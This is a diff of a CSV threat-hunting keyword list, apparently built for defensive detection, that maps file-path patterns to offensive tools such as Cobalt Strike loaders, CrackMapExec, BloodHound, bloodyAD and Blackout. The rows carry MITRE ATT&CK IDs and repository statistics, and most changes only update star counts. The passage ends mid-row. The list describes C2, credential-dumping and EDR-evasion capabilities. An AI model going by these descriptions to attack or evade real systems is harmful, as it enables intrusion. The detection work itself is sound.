+"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
 "*/bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/bitsadmin/bitsadmin.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
@@ -2862,18 +2868,18 @@
 "*/blob/main/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z"
 "*/BlockEtw.git*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z"
 "*/BlockOpenHandle.git*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z"
-"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
 "*/bloodhound_domain.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/bloodhound_domaintrust.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/bloodhound_gpo.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/bloodhound_object.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/bloodhound_ou.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/bloodhound_schema.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
-"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
 "*/bloodhound-quickwin.git*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z"
-"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z"
+"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
 "*/bluscreenofjeff/*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*/Bo0oM*","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/bof.cpp *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
@@ -2900,13 +2906,13 @@ "*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/boko.py*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/boku7/whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
